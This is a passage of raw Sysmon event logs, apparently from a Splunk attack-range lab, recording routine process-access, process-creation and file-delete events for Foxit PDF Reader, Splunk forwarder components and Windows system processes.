Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+cd255(wow64)|C:\Windows\System32\windows.storage.dll+ccfb8(wow64)|C:\Windows\System32\windows.storage.dll+cd6f2(wow64)|C:\Windows\System32\COMDLG32.dll+189f6(wow64)|C:\Windows\System32\COMDLG32.dll+1879d(wow64)|C:\Windows\System32\COMDLG32.dll+1d816(wow64)|C:\Windows\System32\COMDLG32.dll+1b519(wow64) 10341000x800000000000000040576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.386{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+cd255(wow64)|C:\Windows\System32\windows.storage.dll+ccfb8(wow64)|C:\Windows\System32\windows.storage.dll+cd6f2(wow64)|C:\Windows\System32\COMDLG32.dll+189f6(wow64)|C:\Windows\System32\COMDLG32.dll+1879d(wow64)|C:\Windows\System32\COMDLG32.dll+1d816(wow64)|C:\Windows\System32\COMDLG32.dll+1b519(wow64)|C:\Windows\System32\COMDLG32.dll+26b78(wow64) 23542300x800000000000000015557Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.692{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F83CEA9F5A16E86A20C9B676CC6FA4F,SHA256=4485FC70854D53B2CBEA49E8C08F07A0AAE4013F4FA9F770562A142547353CD2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015556Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.537{E5A8D418-E398-63C7-EB01-00000000B002}18843544C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015555Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.380{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E398-63C7-EB01-00000000B002}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015554Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.380{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015553Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.380{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015552Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.380{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015551Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.380{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015550Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.380{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015549Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.380{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015548Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.380{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015547Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.380{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015546Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.380{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015545Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.380{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E398-63C7-EB01-00000000B002}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015544Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.380{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E398-63C7-EB01-00000000B002}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015543Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.381{E5A8D418-E398-63C7-EB01-00000000B002}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000040725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:32.620{FE4C2B44-E398-63C7-0F06-00000000AF02}52727148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000040724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:32.620{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9D5D0A19EEC7947F8174DE99AB722C0,SHA256=1DC6685AEE686C342CD00C6DBBEC1EF73E9CB51EE9530952669793C1117114E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:32.480{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E398-63C7-0F06-00000000AF02}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:32.479{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:32.478{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:32.478{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:32.478{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:32.478{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E398-63C7-0F06-00000000AF02}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:32.478{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E398-63C7-0F06-00000000AF02}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:32.478{FE4C2B44-E398-63C7-0F06-00000000AF02}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000040715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:32.193{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program 